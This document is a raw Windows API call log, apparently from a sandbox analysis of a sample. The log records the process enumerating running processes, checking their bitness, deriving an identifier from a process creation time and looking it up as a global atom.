	[0127.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.270] CloseHandle (hObject=0x2dc) returned 1
	[0127.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.270] CloseHandle (hObject=0x2dc) returned 1
	[0127.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.270] GetLastError () returned 0x5
	[0127.270] GetLastError () returned 0x5
	[0127.270] GetLastError () returned 0x5
	[0127.270] GetLastError () returned 0x5
	[0127.270] GetLastError () returned 0x5
	[0127.270] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.271] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.272] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.272] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.272] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.273] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.274] GetLastError () returned 0x5
	[0127.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.275] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.275] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.275] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.275] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.275] CloseHandle (hObject=0x2dc) returned 1
	[0127.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.276] CloseHandle (hObject=0x2dc) returned 1
	[0127.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.276] CloseHandle (hObject=0x2dc) returned 1
	[0127.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.277] CloseHandle (hObject=0x2dc) returned 1
	[0127.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.277] CloseHandle (hObject=0x2dc) returned 1
	[0127.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.277] CloseHandle (hObject=0x2dc) returned 1
	[0127.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.313] CloseHandle (hObject=0x2dc) returned 1
	[0127.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.314] CloseHandle (hObject=0x2dc) returned 1
	[0127.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.314] CloseHandle (hObject=0x2dc) returned 1
	[0127.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.315] CloseHandle (hObject=0x2dc) returned 1
	[0127.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.315] CloseHandle (hObject=0x2dc) returned 1
	[0127.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.315] CloseHandle (hObject=0x2dc) returned 1
	[0127.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.316] CloseHandle (hObject=0x2dc) returned 1
	[0127.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.316] CloseHandle (hObject=0x2dc) returned 1
	[0127.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.316] CloseHandle (hObject=0x2dc) returned 1
	[0127.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.317] CloseHandle (hObject=0x2dc) returned 1
	[0127.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.318] CloseHandle (hObject=0x2dc) returned 1
	[0127.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.318] CloseHandle (hObject=0x2dc) returned 1
	[0127.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.318] CloseHandle (hObject=0x2dc) returned 1
	[0127.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.319] CloseHandle (hObject=0x2dc) returned 1
	[0127.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.319] CloseHandle (hObject=0x2dc) returned 1
	[0127.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.320] CloseHandle (hObject=0x2dc) returned 1
	[0127.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.320] CloseHandle (hObject=0x2dc) returned 1
	[0127.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.320] CloseHandle (hObject=0x2dc) returned 1
	[0127.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.321] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.321] CloseHandle (hObject=0x2dc) returned 1
	[0127.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.321] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.321] CloseHandle (hObject=0x2dc) returned 1
	[0127.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.322] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.322] CloseHandle (hObject=0x2dc) returned 1
